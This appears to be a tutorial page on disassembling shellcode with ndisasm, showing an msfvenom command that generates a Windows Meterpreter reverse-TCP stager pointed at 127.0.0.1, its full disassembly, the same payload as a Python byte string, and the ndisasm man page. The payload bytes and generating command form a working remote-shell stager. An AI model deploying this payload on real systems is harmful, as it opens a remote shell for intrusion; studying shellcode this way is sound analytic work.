msfvenom / ndisasm - disassemble shellcode

root:~ /# msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 -a x86 -f raw --platform win  | ndisasm -u -Found 0 compatible encoders00000000  FC                cld00000001  E886000000        call dword 0x8c00000006  60                pushad00000007  89E5              mov ebp,esp00000009  31D2              xor edx,edx0000000B  648B5230          mov edx,[fs:edx+0x30]0000000F  8B520C            mov edx,[edx+0xc]00000012  8B5214            mov edx,[edx+0x14]00000015  8B7228            mov esi,[edx+0x28]00000018  0FB74A26          movzx ecx,word [edx+0x26]0000001C  31FF              xor edi,edi0000001E  31C0              xor eax,eax00000020  AC                lodsb00000021  3C61              cmp al,0x6100000023  7C02              jl 0x2700000025  2C20              sub al,0x2000000027  C1CF0D            ror edi,0xd0000002A  01C7              add edi,eax0000002C  E2F0              loop 0x1e0000002E  52                push edx0000002F  57                push edi00000030  8B5210            mov edx,[edx+0x10]00000033  8B423C            mov eax,[edx+0x3c]00000036  8B4C1078          mov ecx,[eax+edx+0x78]0000003A  E34A              jecxz 0x860000003C  01D1              add ecx,edx0000003E  51                push ecx0000003F  8B5920            mov ebx,[ecx+0x20]00000042  01D3              add ebx,edx00000044  8B4918            mov ecx,[ecx+0x18]00000047  E33C              jecxz 0x8500000049  49                dec ecx0000004A  8B348B            mov esi,[ebx+ecx*4]0000004D  01D6              add esi,edx0000004F  31FF              xor edi,edi00000051  31C0              xor eax,eax00000053  AC                lodsb00000054  C1CF0D            ror edi,0xd00000057  01C7              add edi,eax00000059  38E0              cmp al,ah0000005B  75F4              jnz 0x510000005D  037DF8            add edi,[ebp-0x8]00000060  3B7D24            cmp edi,[ebp+0x24]00000063  75E2              jnz 0x4700000065  58                pop eax00000066  8B5824            mov 
ebx,[eax+0x24]00000069  01D3              add ebx,edx0000006B  668B0C4B          mov cx,[ebx+ecx*2]0000006F  8B581C            mov ebx,[eax+0x1c]00000072  01D3              add ebx,edx00000074  8B048B            mov eax,[ebx+ecx*4]00000077  01D0              add eax,edx00000079  89442424          mov [esp+0x24],eax0000007D  5B                pop ebx0000007E  5B                pop ebx0000007F  61                popad00000080  59                pop ecx00000081  5A                pop edx00000082  51                push ecx00000083  FFE0              jmp eax00000085  58                pop eax00000086  5F                pop edi00000087  5A                pop edx00000088  8B12              mov edx,[edx]0000008A  EB89              jmp short 0x150000008C  5D                pop ebp0000008D  6833320000        push dword 0x323300000092  687773325F        push dword 0x5f32737700000097  54                push esp00000098  684C772607        push dword 0x726774c0000009D  FFD5              call ebp0000009F  B890010000        mov eax,0x190000000A4  29C4              sub esp,eax000000A6  54                push esp000000A7  50                push eax000000A8  6829806B00        push dword 0x6b8029000000AD  FFD5              call ebp000000AF  50                push eax000000B0  50                push eax000000B1  50                push eax000000B2  50                push eax000000B3  40                inc eax000000B4  50                push eax000000B5  40                inc eax000000B6  50                push eax000000B7  68EA0FDFE0        push dword 0xe0df0fea000000BC  FFD5              call ebp000000BE  97                xchg eax,edi000000BF  6A05              push byte +0x5000000C1  687F000001        push dword 0x100007f000000C6  680200115C        push dword 0x5c110002000000CB  89E6              mov esi,esp000000CD  6A10              push byte +0x10000000CF  56                push esi000000D0  57                push edi000000D1  6899A57461        push dword 0x6174a599000000D6  FFD5 
             call ebp000000D8  85C0              test eax,eax000000DA  740C              jz 0xe8000000DC  FF4E08            dec dword [esi+0x8]000000DF  75EC              jnz 0xcd000000E1  68F0B5A256        push dword 0x56a2b5f0000000E6  FFD5              call ebp000000E8  6A00              push byte +0x0000000EA  6A04              push byte +0x4000000EC  56                push esi000000ED  57                push edi000000EE  6802D9C85F        push dword 0x5fc8d902000000F3  FFD5              call ebp000000F5  8B36              mov esi,[esi]000000F7  6A40              push byte +0x40000000F9  6800100000        push dword 0x1000000000FE  56                push esi000000FF  6A00              push byte +0x000000101  6858A453E5        push dword 0xe553a45800000106  FFD5              call ebp00000108  93                xchg eax,ebx00000109  53                push ebx0000010A  6A00              push byte +0x00000010C  56                push esi0000010D  53                push ebx0000010E  57                push edi0000010F  6802D9C85F        push dword 0x5fc8d90200000114  FFD5              call ebp00000116  01C3              add ebx,eax00000118  29C6              sub esi,eax0000011A  85F6              test esi,esi0000011C  75EC              jnz 0x10a0000011E  C3                ret

If you have the shellcode as a Python script instead, you can disassemble it the same way: run the script so that the raw bytes go to stdout and pipe them into `ndisasm -u -` (`-u` selects 32-bit mode, matching the `-a x86` payload above; the script is run with `python2` because its `print buf` statement writes the string's raw bytes).

root:~ /# cat shellcode.py #!/usr/bin/env python# -*- coding: utf8 -*-buf =  ""buf += "\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b"buf += "\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"buf += "\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20"buf += "\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b"buf += "\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59"buf += "\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01"buf += "\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0"buf += "\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58"buf += "\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"buf += "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a"buf += "\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33"buf += "\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26"buf += "\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"buf += "\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40"buf += "\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x7f"buf += "\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56"buf += "\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff"buf += "\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00"buf += "\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36"buf += "\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4"buf += "\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02"buf += "\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec"buf += "\xc3"print bufroot:~ /# python2 shellcode.py | ndisasm -u -00000000  FC                cld00000001  E886000000        call dword 0x8c00000006  60                pushad00000007  89E5              mov ebp,esp00000009  31D2              xor edx,edx0000000B  648B5230          mov edx,[fs:edx+0x30]0000000F  8B520C            mov edx,[edx+0xc]00000012  8B5214            mov edx,[edx+0x14]00000015  8B7228            mov esi,[edx+0x28]00000018  0FB74A26          movzx ecx,word [edx+0x26]0000001C  31FF              xor edi,edi0000001E  31C0              xor eax,eax00000020 
 AC                lodsb00000021  3C61              cmp al,0x6100000023  7C02              jl 0x2700000025  2C20              sub al,0x2000000027  C1CF0D            ror edi,0xd0000002A  01C7              add edi,eax0000002C  E2F0              loop 0x1e0000002E  52                push edx0000002F  57                push edi00000030  8B5210            mov edx,[edx+0x10]00000033  8B423C            mov eax,[edx+0x3c]00000036  8B4C1078          mov ecx,[eax+edx+0x78]0000003A  E34A              jecxz 0x860000003C  01D1              add ecx,edx0000003E  51                push ecx0000003F  8B5920            mov ebx,[ecx+0x20]00000042  01D3              add ebx,edx00000044  8B4918            mov ecx,[ecx+0x18]00000047  E33C              jecxz 0x8500000049  49                dec ecx0000004A  8B348B            mov esi,[ebx+ecx*4]0000004D  01D6              add esi,edx0000004F  31FF              xor edi,edi00000051  31C0              xor eax,eax00000053  AC                lodsb00000054  C1CF0D            ror edi,0xd00000057  01C7              add edi,eax00000059  38E0              cmp al,ah0000005B  75F4              jnz 0x510000005D  037DF8            add edi,[ebp-0x8]00000060  3B7D24            cmp edi,[ebp+0x24]00000063  75E2              jnz 0x4700000065  58                pop eax00000066  8B5824            mov ebx,[eax+0x24]00000069  01D3              add ebx,edx0000006B  668B0C4B          mov cx,[ebx+ecx*2]0000006F  8B581C            mov ebx,[eax+0x1c]00000072  01D3              add ebx,edx00000074  8B048B            mov eax,[ebx+ecx*4]00000077  01D0              add eax,edx00000079  89442424          mov [esp+0x24],eax0000007D  5B                pop ebx0000007E  5B                pop ebx0000007F  61                popad00000080  59                pop ecx00000081  5A                pop edx00000082  51                push ecx00000083  FFE0              jmp eax00000085  58                pop eax00000086  5F                pop edi00000087  5A                pop edx00000088  
8B12              mov edx,[edx]0000008A  EB89              jmp short 0x150000008C  5D                pop ebp0000008D  6833320000        push dword 0x323300000092  687773325F        push dword 0x5f32737700000097  54                push esp00000098  684C772607        push dword 0x726774c0000009D  FFD5              call ebp0000009F  B890010000        mov eax,0x190000000A4  29C4              sub esp,eax000000A6  54                push esp000000A7  50                push eax000000A8  6829806B00        push dword 0x6b8029000000AD  FFD5              call ebp000000AF  50                push eax000000B0  50                push eax000000B1  50                push eax000000B2  50                push eax000000B3  40                inc eax000000B4  50                push eax000000B5  40                inc eax000000B6  50                push eax000000B7  68EA0FDFE0        push dword 0xe0df0fea000000BC  FFD5              call ebp000000BE  97                xchg eax,edi000000BF  6A05              push byte +0x5000000C1  687F000001        push dword 0x100007f000000C6  680200115C        push dword 0x5c110002000000CB  89E6              mov esi,esp000000CD  6A10              push byte +0x10000000CF  56                push esi000000D0  57                push edi000000D1  6899A57461        push dword 0x6174a599000000D6  FFD5              call ebp000000D8  85C0              test eax,eax000000DA  740C              jz 0xe8000000DC  FF4E08            dec dword [esi+0x8]000000DF  75EC              jnz 0xcd000000E1  68F0B5A256        push dword 0x56a2b5f0000000E6  FFD5              call ebp000000E8  6A00              push byte +0x0000000EA  6A04              push byte +0x4000000EC  56                push esi000000ED  57                push edi000000EE  6802D9C85F        push dword 0x5fc8d902000000F3  FFD5              call ebp000000F5  8B36              mov esi,[esi]000000F7  6A40              push byte +0x40000000F9  6800100000        push dword 0x1000000000FE  56                push 
esi000000FF  6A00              push byte +0x000000101  6858A453E5        push dword 0xe553a45800000106  FFD5              call ebp00000108  93                xchg eax,ebx00000109  53                push ebx0000010A  6A00              push byte +0x00000010C  56                push esi0000010D  53                push ebx0000010E  57                push edi0000010F  6802D9C85F        push dword 0x5fc8d90200000114  FFD5              call ebp00000116  01C3              add ebx,eax00000118  29C6              sub esi,eax0000011A  85F6              test esi,esi0000011C  75EC              jnz 0x10a0000011E  C3                ret

NDISASM(1)                                                                                                                                                NDISASM(1)NAME       ndisasm - the Netwide Disassembler, an 80x86 binary file disassemblerSYNOPSIS       ndisasm [ -o origin ] [ -s sync-point [...]]  [ -a | -i ] [ -b bits ] [ -u ] [ -e hdrlen ] [ -k offset,length [...]]  infile       ndisasm -h       ndisasm -rDESCRIPTION       The ndisasm command generates a disassembly listing of the binary file infile and directs it to stdout.   OPTIONS       -h     Causes ndisasm to exit immediately, after giving a summary of its invocation options.       -r     Causes ndisasm to exit immediately, after displaying its version number.       -o origin              Specifies  the  notional load address for the file. This option causes ndisasm to get the addresses it lists down the left hand margin, and the target              addresses of PC-relative jumps and calls, right.       -s sync-point              Manually specifies a synchronisation address, such that ndisasm will not output any machine instruction which encompasses bytes on both sides  of  the              address. Hence the instruction which starts at that address will be correctly disassembled.       -e hdrlen              Specifies  a number of bytes to discard from the beginning of the file before starting disassembly. This does not count towards the calculation of the              disassembly offset: the first disassembled instruction will be shown starting at the given load address.       -k offset,length              Specifies that length bytes, starting from disassembly offset offset, should be skipped over without generating any output. The  skipped  bytes  still              count towards the calculation of the disassembly offset.       
-a or -i              Enables  automatic (or intelligent) sync mode, in which ndisasm will attempt to guess where synchronisation should be performed, by means of examining              the target addresses of the relative jumps and calls it disassembles.       -b bits              Specifies 16-, 32- or 64-bit mode. The default is 16-bit mode.       -u     Specifies 32-bit mode, more compactly than using `-b 32'.       -p vendor              Prefers instructions as defined by vendor in case of a conflict.  Known vendor names include intel, amd, cyrix, and idt.  The default is intel.RESTRICTIONS       ndisasm only disassembles binary files: it has no understanding of the header information present in object or executable files. If you want  to  disassemble       an object file, you should probably be using objdump(1).       Auto-sync  mode  won't  necessarily  cure  all your synchronisation problems: a sync marker can only be placed automatically if a jump or call instruction is       found to refer to it before ndisasm actually disassembles that part of the code. Also, if spurious jumps or calls result from disassembling  non-machine-code       data, sync markers may get placed in strange places. Feel free to turn auto-sync off and go back to doing it manually if necessary.SEE ALSO       objdump(1).                                                                    The Netwide Assembler Project                                                         NDISASM(1) Manual page ndisas